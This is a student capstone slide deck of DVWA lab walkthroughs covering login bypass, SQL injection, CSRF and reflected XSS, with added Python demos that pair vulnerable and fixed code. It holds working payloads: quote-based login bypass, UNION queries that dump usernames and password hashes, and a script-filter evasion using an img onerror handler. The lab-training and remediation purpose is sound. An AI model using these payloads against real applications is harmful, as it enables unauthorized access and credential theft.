Capstone project • Solving Labs for Common Web Vulnerabilities • Login Bypass, Admin Credentials Access (SQLi), CSRF, XSS Aniket Jha
PROJECT OVERVIEW • Introduction • Login Bypass • Admin Credentials Access (SQLi) • Cross-Site Request Forgery (CSRF) • Cross-Site Scripting (XSS) • Conclusion
Introduction • What are Web Vulnerabilities? • Web vulnerabilities are weaknesses in web applications that attackers can exploit to gain unauthorized access, manipulate data, or perform other malicious activities.
Login Bypass • Description: • A technique used by attackers to gain access to an application by bypassing the authentication mechanism. • Example: • Manipulating the login form inputs (for instance with a quote-based SQL payload) to bypass authentication checks.
Login Bypass: • Mechanism: • Exploits flaws in the authentication process to gain unauthorized access. • Impact: • Unauthorized access to user accounts, sensitive data, and administrative functions.
POC of login bypass
SQL Injection (SQLi) • Description: • An attack where malicious SQL code is inserted into an input field to manipulate the backend database. • Example: • Using SQL queries to retrieve or alter data in a database through a vulnerable input field.
SQL Injection (SQLi): • Mechanism: • Manipulates SQL queries by injecting malicious code into input fields. • Impact: • Data breaches, data loss, unauthorized data manipulation, and potential control of the database server.
DVWA SQL INJECTION • Before we begin, we need to ensure that our DVWA security setting is low.
POC of SQL injection
The flaw in the code shown is that it is vulnerable to SQL injection. The vulnerability arises from concatenating user input directly into the SQL query without validation or parameterization. • In the code, the id parameter is taken from the request without any validation or sanitization and is concatenated straight into the SQL query string (in DVWA's low-level source: SELECT first_name, last_name FROM users WHERE user_id = '$id').
This lets an attacker control the value of id and inject SQL, potentially leading to unauthorized access, data leakage, or even complete loss of data. • The fix is to pass the id as a bound parameter of a prepared statement (and, since it is numeric, to reject anything that is not a number) so that user input can never change the structure of the query.
Submitting 1' OR '1'='1'# as the id means the query executed by the database was: • SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1'#' • The OR makes the WHERE clause true for every row and the # comments out the trailing quote, so every user is returned.
' UNION SELECT table_name, NULL FROM information_schema.tables -- • (the UNION must return the same number of columns as the original query, two here, hence the NULL; in MySQL the -- comment needs a trailing space, or use # instead)
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' --
Now we can see we got both the username and the password hash (DVWA stores unsalted MD5 hashes, which are quickly cracked offline): • ' UNION SELECT user, password FROM users --
Medium • At the Medium level the id is chosen from a drop-down and submitted by POST, and quotes are escaped with mysqli_real_escape_string, but the id is not quoted in the query, so a purely numeric injection without quotes still works. We intercept the request (for example in Burp Suite) and send it to Repeater.
Edit id=1 to the payload below, send it, and the usernames and password hashes appear in the response. • 1 UNION SELECT user, password FROM users --
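The login-bypass payload from the Login Bypass section and the UNION payloads from the walkthrough above, replayed against a small database so the mechanism can be seen outside DVWA. This is an added example, not DVWA's code or the author's: it uses an in-memory SQLite users table with constructed rows instead of DVWA's MySQL database, so the comment marker is -- (SQLite has no # comment) and sqlite_master stands in for information_schema. The vulnerable functions build the query by string concatenation exactly as the slides describe; the safe ones bind the input as a parameter.

```python
"""Added example, not DVWA's own code: the login-bypass payload and the UNION
payloads from the slides replayed against an in-memory SQLite copy of a
DVWA-style users table, beside the parameterised queries that close the hole.

Assumptions (not from the slides): SQLite instead of MySQL, so the comment
marker is '--' (SQLite has no '#' comment) and sqlite_master stands in for
information_schema; the rows are constructed sample data."""
import hashlib
import sqlite3

# Constructed sample users; DVWA stores passwords as unsalted MD5 hashes.
USERS = [("admin", "password"), ("gordonb", "abc123")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
               "password TEXT, first_name TEXT, last_name TEXT)")
    for i, (user, pw) in enumerate(USERS, start=1):
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   (i, user, hashlib.md5(pw.encode()).hexdigest(), user.title(), "User"))
    return db


# ---- vulnerable: user input is concatenated into the query text ------------
def login_vulnerable(db, username: str, password: str) -> bool:
    # The attacker owns the quotes, so a quote in the username rewrites the WHERE clause.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = f"SELECT user FROM users WHERE user = '{username}' AND password = '{pw_hash}'"
    return db.execute(query).fetchone() is not None


def lookup_vulnerable(db, user_id: str) -> list:
    # Same shape as DVWA Low: SELECT first_name, last_name FROM users WHERE user_id = '$id'
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


# ---- fixed: bound parameters; input stays data and can never become SQL -----
def login_safe(db, username: str, password: str) -> bool:
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("SELECT user FROM users WHERE user = ? AND password = ?",
                     (username, pw_hash)).fetchone()
    return row is not None


def lookup_safe(db, user_id: str) -> list:
    if not user_id.isdigit():  # the id is numeric; anything else is rejected outright
        return []
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (int(user_id),)).fetchall()


def demo() -> dict:
    """Run each payload against both versions and return what came back."""
    db = make_db()
    bypass = "' OR '1'='1' --"                                    # login bypass
    tables = "1' UNION SELECT name, NULL FROM sqlite_master --"   # table enumeration
    creds = "1' UNION SELECT user, password FROM users --"        # credential dump
    return {
        "bypass_vulnerable": login_vulnerable(db, bypass, "wrong"),
        "bypass_safe": login_safe(db, bypass, "wrong"),
        "tables_vulnerable": lookup_vulnerable(db, tables),
        "creds_vulnerable": lookup_vulnerable(db, creds),
        "creds_safe": lookup_safe(db, creds),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Run it and the vulnerable login accepts the bypass string with a wrong password, the UNION lookups return the table names and the user/hash pairs alongside the legitimate row, and the parameterised versions return nothing for the same inputs. The numeric check in lookup_safe is the extra belt that the Medium-level walkthrough shows is needed: escaping quotes alone does not help when the value is not quoted in the query.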
Cross-Site Request Forgery (CSRF) • Description: • An attack where a malicious website tricks a user's browser into performing an unwanted action on another site where the user is authenticated. • Example: • Forcing a user to transfer funds without their consent.
Cross-Site Request Forgery (CSRF): • Mechanism: • Leverages authenticated user sessions to perform unwanted actions. • Impact: • Unauthorized actions executed on behalf of the user, such as fund transfers, changing account settings, or posting malicious content.
POC of CSRF
The vulnerability is that the password-change code has no mechanism to verify where the request came from: there is no anti-CSRF token, and the change is accepted on a plain GET. An attacker can therefore construct a URL containing the necessary parameters (password_new and password_conf) and send it to a victim. If the victim opens the link while logged in to the vulnerable website, the browser attaches the session cookie and the password change is executed without any further authentication or user consent. • Now we perform the attack. • First, set a new password "123" and click Change.
After changing the password, notice that the URL carries the new password in its query string (the password_new and password_conf parameters are right there) and contains no CSRF token. In the absence of CSRF protection an attacker can reuse exactly this URL, tricking the victim into opening it while logged in to the vulnerable website.
We can see that the password has been changed.
Cross-Site Scripting (XSS) • Description: • XSS is a technique in which an attacker injects malicious script into a target website so that it runs in other users' browsers, which lets the attacker act as those users and, if an administrator is hit, take control of the site. If a website reflects or stores user input such as comments, usernames or email addresses without proper output encoding, the attacker can insert script as well as text. • Example: • Injecting a script that captures cookies and sends them to an attacker.
TYPES OF XSS: • 1. Reflected XSS • 2. Stored XSS • 3. DOM-based XSS
Cross-Site Scripting (XSS): • Mechanism: • Injects malicious scripts into web pages viewed by other users. • Impact: • Theft of user data (cookies, session tokens), spreading malware, and defacement of web content.
POC of XSS
Reflected XSS (RXSS): • In this case the attacker's data is not stored on the website. The attacker gets the victim to send a request whose input contains script (typically through a crafted link); the website reflects that input back in its response, and the script executes in the victim's browser. • Let's try cross-site scripting in a virtual environment • Requirements: • 1. DVWA (Damn Vulnerable Web Application) • 2. A browser such as Firefox, Chrome or Internet Explorer
DVWA Reflected XSS: • Payload: <script>alert("xss")</script> • This payload fires at the Low security level used below; at DVWA's High level a regular expression strips any <script tag, so a payload built on another tag with an event handler (for example an <img> with onerror) is needed instead.
We then log in to DVWA with: • username: admin • password: password • Once we are in, we set the security level to Low as shown below and submit the payload in the reflected input field.
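The reflection that makes the payload above fire, as an added example rather than DVWA's code: the function that builds the "Hello name" response in three versions, raw reflection (Low), a blacklist regex modelled on DVWA's High-level filter, and proper output encoding. The <script> payload is the one from the slides; the <img onerror> payload, the page template and the injected() check are constructed for the example.

```python
"""Added example, not DVWA's own code: the reflected-XSS flaw from the slides,
modelled as the function that builds the 'Hello <name>' response.  Three
versions are shown: raw reflection (DVWA Low), a blacklist regex modelled on
DVWA's High-level filter, and output encoding.  The <script> payload is the
slide's; the <img onerror> payload and the page template are constructed."""
import html
import re

SCRIPT_PAYLOAD = '<script>alert("xss")</script>'     # payload from the slides
EVENT_PAYLOAD = '<img src=x onerror=alert("xss")>'    # constructed: no 'script' substring

# Modelled on DVWA High: strips any run that spells s-c-r-i-p-t after a '<'.
SCRIPT_BLACKLIST = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)

TEMPLATE_HEAD, TEMPLATE_TAIL = "<pre>Hello ", "</pre>"  # assumed page template


def render_low(name: str) -> str:
    # Raw reflection: the URL parameter is dropped straight into the HTML body.
    return f"{TEMPLATE_HEAD}{name}{TEMPLATE_TAIL}"


def render_high(name: str) -> str:
    # Blacklist: removes '<script', leaves every other tag and on* handler alone.
    return f"{TEMPLATE_HEAD}{SCRIPT_BLACKLIST.sub('', name)}{TEMPLATE_TAIL}"


def render_fixed(name: str) -> str:
    # Output encoding for the HTML-body context: < > & " ' become entities, so
    # the browser displays the text and never parses it as markup.
    return f"{TEMPLATE_HEAD}{html.escape(name, quote=True)}{TEMPLATE_TAIL}"


TAG_RE = re.compile(r"<[a-zA-Z][^>]*>")  # crude check: did an HTML tag survive?


def injected(rendered: str) -> bool:
    """True if the reflected part of the response still contains a live tag."""
    reflected = rendered[len(TEMPLATE_HEAD):-len(TEMPLATE_TAIL)]
    return TAG_RE.search(reflected) is not None


def demo() -> dict:
    """Which (filter, payload) pairs leave executable markup in the response."""
    results = {}
    for label, render in (("low", render_low), ("high", render_high), ("fixed", render_fixed)):
        results[f"{label}_script"] = injected(render(SCRIPT_PAYLOAD))
        results[f"{label}_event"] = injected(render(EVENT_PAYLOAD))
    return results


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name}: {'XSS' if hit else 'blocked'}")
```

The point the three versions make: a blacklist of dangerous strings is not a fix, because the browser accepts far more than the blacklist anticipates, while encoding the value for the context it lands in (here the HTML body; attribute, URL and JavaScript contexts need their own encoders) removes the ambiguity entirely.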
Importance of Securing Web Applications • Protect Sensitive Data: • Ensures that personal and financial information is safeguarded against unauthorized access and breaches. • Maintain User Trust: • Users expect their data to be protected. Security breaches can damage the reputation and trustworthiness of an organization.
• Prevent Financial Loss: • Security incidents can result in significant financial losses due to fraud, theft, and the costs associated with incident response and remediation. • Compliance: • Many industries are governed by regulations that mandate specific security measures (e.g., GDPR, HIPAA, PCI-DSS). Failure to comply can result in legal penalties. • Prevent Business Disruption: • Attacks can disrupt business operations, causing downtime and loss of productivity.
Conclusion: •Securing web applications is critical to protecting data, maintaining trust, and ensuring business continuity. • Understanding and mitigating these vulnerabilities can significantly enhance the security posture of any web application.
Q&A • Open the floor for questions !
Thank You!!
